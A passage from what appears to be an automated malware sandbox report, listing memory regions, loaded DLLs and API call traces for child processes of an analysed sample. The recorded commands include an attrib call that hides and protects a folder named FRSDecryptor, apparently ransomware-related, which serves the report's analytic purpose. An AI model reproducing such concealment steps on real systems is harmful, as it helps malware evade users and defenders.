0x7f8b0000 end_va = 0x7f9affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f8b0000" filename = "" Region: id = 2094 start_va = 0xff0000 end_va = 0xff3fff entry_point = 0x0 region_type = private name = "private_0x0000000000ff0000" filename = "" Region: id = 2095 start_va = 0x1150000 end_va = 0x1150fff entry_point = 0x0 region_type = private name = "private_0x0000000001150000" filename = "" Region: id = 2096 start_va = 0x1160000 end_va = 0x1160fff entry_point = 0x0 region_type = private name = "private_0x0000000001160000" filename = "" Region: id = 2097 start_va = 0x12c0000 end_va = 0x1447fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000012c0000" filename = "" Region: id = 2098 start_va = 0x14b0000 end_va = 0x14bffff entry_point = 0x0 region_type = private name = "private_0x00000000014b0000" filename = "" Region: id = 2099 start_va = 0x14c0000 end_va = 0x1640fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000014c0000" filename = "" Region: id = 2100 start_va = 0x1650000 end_va = 0x2a4ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001650000" filename = "" Region: id = 2101 start_va = 0x73650000 end_va = 0x7365efff entry_point = 0x73650000 region_type = mapped_file name = "fsutilext.dll" filename = "\\Windows\\SysWOW64\\fsutilext.dll" (normalized: "c:\\windows\\syswow64\\fsutilext.dll") Region: id = 2102 start_va = 0x74a60000 end_va = 0x74ab2fff entry_point = 0x74a60000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 2103 start_va = 0x74ac0000 end_va = 0x74ac8fff entry_point = 0x74ac0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 2104 start_va = 0x74ad0000 end_va = 0x74aecfff entry_point = 0x74ad0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 2105 start_va = 0x75360000 end_va = 0x75456fff entry_point = 0x75360000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 2106 start_va = 0x76dc0000 end_va = 0x76de4fff entry_point = 0x76dc0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Thread: id = 90 os_tid = 0x750 Process: id = "45" image_name = "attrib.exe" filename = "c:\\windows\\syswow64\\attrib.exe" page_root = "0x10cfa000" os_pid = "0x6c8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "43" os_parent_pid = "0x958" cmd_line = "attrib +s +a +h +r C:\\FRSDecryptor" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2107 start_va = 0x970000 end_va = 0x98ffff entry_point = 0x0 region_type = private name = "private_0x0000000000970000" filename = "" Region: id = 2108 start_va = 0x990000 end_va = 0x991fff entry_point = 0x0 region_type = private name = "private_0x0000000000990000" filename = "" Region: id = 2109 start_va = 0x9a0000 end_va = 0x9aefff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009a0000" filename = "" Region: id = 2110 start_va = 0x9b0000 end_va = 0x9effff entry_point = 0x0 region_type = private name = "private_0x00000000009b0000" filename = "" Region: id = 2111 start_va = 0x9f0000 end_va = 0xa2ffff entry_point = 0x0 region_type = private name = "private_0x00000000009f0000" filename = "" Region: id = 2112 start_va = 0xa30000 end_va = 0xa33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a30000" filename = "" Region: id = 2113 start_va = 0xa40000 end_va = 0xa40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a40000" filename = "" Region: id = 2114 start_va = 0xa50000 end_va = 0xa51fff entry_point = 0x0 region_type = private name = "private_0x0000000000a50000" filename = "" Region: id = 2115 start_va = 0xe40000 end_va = 0xe47fff entry_point = 0xe40000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\SysWOW64\\attrib.exe" (normalized: "c:\\windows\\syswow64\\attrib.exe") Region: id = 2116 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2117 start_va = 0x7f1f0000 end_va = 0x7f212fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f1f0000" filename = "" Region: id = 2118 start_va = 0x7f21a000 end_va = 0x7f21afff entry_point = 0x0 region_type = private name = "private_0x000000007f21a000" filename = "" Region: id = 2119 start_va = 0x7f21c000 end_va = 0x7f21efff entry_point = 0x0 region_type = private name = "private_0x000000007f21c000" filename = "" Region: id = 2120 start_va = 0x7f21f000 end_va = 0x7f21ffff entry_point = 0x0 region_type = private name = "private_0x000000007f21f000" filename = "" Region: id = 2121 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2122 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2123 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2124 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 2125 start_va = 0xc00000 end_va = 0xc0ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c00000" filename = "" Region: id = 2126 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2127 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2128 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2129 start_va = 0x970000 end_va = 0x97ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000970000" filename = "" Region: id = 2130 start_va = 0x980000 end_va = 0x983fff entry_point = 0x0 region_type = private name = "private_0x0000000000980000" filename = "" Region: id = 2131 start_va = 0x990000 end_va = 0x993fff entry_point = 0x0 region_type = private name = "private_0x0000000000990000" filename = "" Region: id = 2132 start_va = 0xa60000 end_va = 0xaddfff entry_point = 0xa60000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2133 start_va = 0xd40000 end_va = 0xd4ffff entry_point = 0x0 region_type = private name = "private_0x0000000000d40000" filename = "" Region: id = 2134 start_va = 0xf90000 end_va = 0x108ffff entry_point = 0x0 region_type = private name = "private_0x0000000000f90000" filename = "" Region: id = 2135 start_va = 0x73660000 end_va = 0x73680fff entry_point = 0x73660000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\SysWOW64\\ulib.dll" (normalized: "c:\\windows\\syswow64\\ulib.dll") Region: id = 2136 start_va = 0x73da0000 end_va = 0x73daefff entry_point = 0x73da0000 region_type = mapped_file name = "fsutilext.dll" filename = "\\Windows\\SysWOW64\\fsutilext.dll" (normalized: "c:\\windows\\syswow64\\fsutilext.dll") Region: id = 2137 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2138 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2139 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2140 start_va = 0x7f0f0000 end_va = 0x7f1effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f0f0000" filename = "" Thread: id = 91 os_tid = 0xa1c Process: id = "46" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0xbb02000" os_pid = "0x780" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "43" os_parent_pid = "0x958" cmd_line = "C:\\Windows\\system32\\cmd.exe /c find \"n\" \"C:\\FRSDecryptor\\1.txt\"" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2141 start_va = 0xab0000 end_va = 0xacffff entry_point = 0x0 region_type = private name = "private_0x0000000000ab0000" filename = "" Region: id = 2142 start_va = 0xad0000 end_va = 0xad1fff entry_point = 0x0 region_type = private name = "private_0x0000000000ad0000" filename = "" Region: id = 2143 start_va = 0xae0000 end_va = 0xaeefff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ae0000" filename = "" Region: id = 2144 start_va = 0xaf0000 end_va = 0xb2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000af0000" filename = "" Region: id = 2145 start_va = 0xb30000 end_va = 0xc2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b30000" filename = "" Region: id = 2146 start_va = 0xc30000 end_va = 0xc33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c30000" filename = "" Region: id = 2147 start_va = 0xc40000 end_va = 0xc40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c40000" filename = "" Region: id = 2148 start_va = 0xc50000 end_va = 0xc51fff entry_point = 0x0 region_type = private name = "private_0x0000000000c50000" filename = "" Region: id = 2149 start_va = 0x1290000 end_va = 0x12defff entry_point = 0x1290000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 2150 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2151 start_va = 0x7ee70000 end_va = 0x7ee92fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ee70000" filename = "" Region: id = 2152 start_va = 0x7ee95000 end_va = 0x7ee95fff entry_point = 0x0 region_type = private name = "private_0x000000007ee95000" filename = "" Region: id = 2153 start_va = 0x7ee9a000 end_va = 0x7ee9afff entry_point = 0x0 region_type = private name = "private_0x000000007ee9a000" filename = "" Region: id = 2154 start_va = 0x7ee9d000 end_va = 0x7ee9ffff entry_point = 0x0 region_type = private name = "private_0x000000007ee9d000" filename = "" Region: id = 2155 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2156 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2157 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2158 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 2159 start_va = 0xc90000 end_va = 0xc9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c90000" filename = "" Region: id = 2160 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2161 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2162 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2163 start_va = 0xab0000 end_va = 0xabffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ab0000" filename = "" Region: id = 2164 start_va = 0xca0000 end_va = 0xd1dfff entry_point = 0xca0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2165 start_va = 0xd20000 end_va = 0xe1ffff entry_point = 0x0 region_type = private name = "private_0x0000000000d20000" filename = "" Region: id = 2166 start_va = 0xe50000 end_va = 0xe5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000e50000" filename = "" Region: id = 2167 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2168 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2169 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2170 start_va = 0x7ed70000 end_va = 0x7ee6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ed70000" filename = "" Region: id = 2171 start_va = 0xac0000 end_va = 0xac3fff entry_point = 0x0 region_type = private name = "private_0x0000000000ac0000" filename = "" Region: id = 2172 start_va = 0xe60000 end_va = 0x1134fff entry_point = 0xe60000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 92 os_tid = 0x610 [0068.800] GetModuleHandleA (lpModuleName=0x0) returned 0x1290000 [0068.800] __set_app_type (_Type=0x1) [0068.800] __p__fmode () returned 0x76ea1768 [0068.800] __p__commode () returned 0x76ea176c [0068.800] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x12a89b1) returned 0x0 [0068.800] __getmainargs (in: _Argc=0x12b51d8, _Argv=0x12b51dc, _Env=0x12b51e0, _DoWildCard=0, _StartInfo=0x12b507c | out: _Argc=0x12b51d8, _Argv=0x12b51dc, _Env=0x12b51e0) returned 0 [0068.800] GetCurrentThreadId () returned 0x610 [0068.800] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x610) returned 0x34 [0068.800] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f70000 [0068.800] GetProcAddress (hModule=0x74f70000, lpProcName="SetThreadUILanguage") returned 0x74fb3daf [0068.800] SetThreadUILanguage (LangId=0x0) returned 0x409 [0068.803] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0068.804] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0xc2faa0 | out: phkResult=0xc2faa0*=0x0) returned 0x2 [0068.804] VirtualQuery (in: lpAddress=0xc2faaf, lpBuffer=0xc2fa48, dwLength=0x1c | out: lpBuffer=0xc2fa48*(BaseAddress=0xc2f000, AllocationBase=0xb30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0068.804] VirtualQuery (in: lpAddress=0xb30000, lpBuffer=0xc2fa48, dwLength=0x1c | out: lpBuffer=0xc2fa48*(BaseAddress=0xb30000, AllocationBase=0xb30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0068.804] VirtualQuery (in: lpAddress=0xb31000, lpBuffer=0xc2fa48, dwLength=0x1c | out: lpBuffer=0xc2fa48*(BaseAddress=0xb31000, AllocationBase=0xb30000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0068.804] VirtualQuery (in: lpAddress=0xb33000, lpBuffer=0xc2fa48, dwLength=0x1c | out: lpBuffer=0xc2fa48*(BaseAddress=0xb33000, AllocationBase=0xb30000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0068.804] VirtualQuery (in: lpAddress=0xc30000, lpBuffer=0xc2fa48, dwLength=0x1c | out: lpBuffer=0xc2fa48*(BaseAddress=0xc30000, AllocationBase=0xc30000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0068.804] GetConsoleOutputCP () returned 0x1b5 [0068.804] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0068.804] SetConsoleCtrlHandler (HandlerRoutine=0x12b1877, Add=1) returned 1 [0068.804] _get_osfhandle (_FileHandle=1) returned 0x90 [0068.804] SetConsoleMode (hConsoleHandle=0x90, dwMode=0x0) returned 0 [0068.805] _get_osfhandle (_FileHandle=1) returned 0x90 [0068.805] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 0 [0068.805] _get_osfhandle (_FileHandle=0) returned 0x8 [0068.805] GetConsoleMode (in: hConsoleHandle=0x8, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0068.805] GetEnvironmentStringsW () returned 0xd240b0* [0068.805] FreeEnvironmentStringsA (penv="=") returned 1 [0068.805] GetEnvironmentStringsW () returned 0xd240b0* [0068.805] FreeEnvironmentStringsA (penv="=") returned 1 [0068.805] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0xc2e9f0 | out: phkResult=0xc2e9f0*=0x44) returned 0x0 [0068.805] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0xc2e9f8, lpData=0xc2e9fc, lpcbData=0xc2e9f4*=0x1000 | out: lpType=0xc2e9f8*=0x0, lpData=0xc2e9fc*=0x0, lpcbData=0xc2e9f4*=0x1000) returned 0x2 [0068.806] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0xc2e9f8, lpData=0xc2e9fc, lpcbData=0xc2e9f4*=0x1000 | out: lpType=0xc2e9f8*=0x4, lpData=0xc2e9fc*=0x1, lpcbData=0xc2e9f4*=0x4) returned 0x0 [0068.806] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0xc2e9f8, lpData=0xc2e9fc, lpcbData=0xc2e9f4*=0x1000 | out: lpType=0xc2e9f8*=0x0, lpData=0xc2e9fc*=0x1, lpcbData=0xc2e9f4*=0x1000) returned 0x2 [0068.806] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0xc2e9f8, lpData=0xc2e9fc, lpcbData=0xc2e9f4*=0x1000 | out: lpType=0xc2e9f8*=0x4, lpData=0xc2e9fc*=0x0, lpcbData=0xc2e9f4*=0x4) returned 0x0 [0068.806] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0xc2e9f8, lpData=0xc2e9fc, lpcbData=0xc2e9f4*=0x1000 | out: lpType=0xc2e9f8*=0x4, lpData=0xc2e9fc*=0x40, lpcbData=0xc2e9f4*=0x4) returned 0x0 [0068.806] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0xc2e9f8, lpData=0xc2e9fc, lpcbData=0xc2e9f4*=0x1000 | out: lpType=0xc2e9f8*=0x4, lpData=0xc2e9fc*=0x40, lpcbData=0xc2e9f4*=0x4) returned 0x0 [0068.806] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0xc2e9f8, lpData=0xc2e9fc, lpcbData=0xc2e9f4*=0x1000 | out: lpType=0xc2e9f8*=0x0, lpData=0xc2e9fc*=0x40, lpcbData=0xc2e9f4*=0x1000) returned 0x2 [0068.806] RegCloseKey (hKey=0x44) returned 0x0 [0068.806] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0xc2e9f0 | out: phkResult=0xc2e9f0*=0x44) returned 0x0 [0068.806] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0xc2e9f8, lpData=0xc2e9fc, lpcbData=0xc2e9f4*=0x1000 | out: lpType=0xc2e9f8*=0x0, lpData=0xc2e9fc*=0x40, lpcbData=0xc2e9f4*=0x1000) returned 0x2 [0068.806] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0xc2e9f8, lpData=0xc2e9fc, lpcbData=0xc2e9f4*=0x1000 | out: lpType=0xc2e9f8*=0x4, lpData=0xc2e9fc*=0x1, lpcbData=0xc2e9f4*=0x4) returned 0x0 [0068.806] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0xc2e9f8, lpData=0xc2e9fc, lpcbData=0xc2e9f4*=0x1000 | out: lpType=0xc2e9f8*=0x0, lpData=0xc2e9fc*=0x1, lpcbData=0xc2e9f4*=0x1000) returned 0x2 [0068.806] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0xc2e9f8, lpData=0xc2e9fc, lpcbData=0xc2e9f4*=0x1000 | out: lpType=0xc2e9f8*=0x4, lpData=0xc2e9fc*=0x0, lpcbData=0xc2e9f4*=0x4) returned 0x0 [0068.806] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0xc2e9f8, lpData=0xc2e9fc, lpcbData=0xc2e9f4*=0x1000 | out: lpType=0xc2e9f8*=0x4, lpData=0xc2e9fc*=0x9, lpcbData=0xc2e9f4*=0x4) returned 0x0 [0068.806] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0xc2e9f8, lpData=0xc2e9fc, lpcbData=0xc2e9f4*=0x1000 | out: lpType=0xc2e9f8*=0x4, lpData=0xc2e9fc*=0x9, lpcbData=0xc2e9f4*=0x4) returned 0x0 [0068.806] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0xc2e9f8, lpData=0xc2e9fc, lpcbData=0xc2e9f4*=0x1000 | out: lpType=0xc2e9f8*=0x0, lpData=0xc2e9fc*=0x9, lpcbData=0xc2e9f4*=0x1000) returned 0x2 [0068.806] RegCloseKey (hKey=0x44) returned 0x0 [0068.806] time (in: timer=0x0 | out: timer=0x0) returned 0x5aa5006f [0068.806] srand (_Seed=0x5aa5006f) [0068.806] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c find \"n\" \"C:\\FRSDecryptor\\1.txt\"" [0068.806] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c find \"n\" \"C:\\FRSDecryptor\\1.txt\"" [0068.806] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12b5a20 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0068.806] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xd240b8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0068.807] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0068.807] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0068.807] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0068.807] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0068.807] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0068.807] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0068.807] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0068.807] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0068.807] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0068.807] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0068.807] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0068.807] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0068.807] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0068.807] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xc2f7d0 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0068.807] GetFullPathNameW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop", nBufferLength=0x104, lpBuffer=0xc2f7d0, lpFilePart=0xc2f7cc | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xc2f7cc*="Desktop") returned 0x1c [0068.807] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 0x11 [0068.807] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xc2f548 | out: lpFindFileData=0xc2f548) returned 0xd242c8 [0068.807] FindClose (in: hFindFile=0xd242c8 | out: hFindFile=0xd242c8) returned 1 [0068.808] FindFirstFileW (in: lpFileName="C:\\Users\\5JgHKoaOfdp", lpFindFileData=0xc2f548 | out: lpFindFileData=0xc2f548) returned 0xd242c8 [0068.808] FindClose (in: hFindFile=0xd242c8 | out: hFindFile=0xd242c8) returned 1 [0068.808] _wcsnicmp (_String1="5JGHKO~1", _String2="5JgHKoaOfdp", _MaxCount=0xb) returned 29 [0068.808] FindFirstFileW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFindFileData=0xc2f548 | out: lpFindFileData=0xc2f548) returned 0xd242c8 [0068.808] FindClose (in: hFindFile=0xd242c8 | out: hFindFile=0xd242c8) returned 1 [0068.808] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 0x11 [0068.808] SetCurrentDirectoryW (lpPathName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 1 [0068.808] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 1 [0068.808] GetEnvironmentStringsW () returned 0xd26180* [0068.808] FreeEnvironmentStringsA 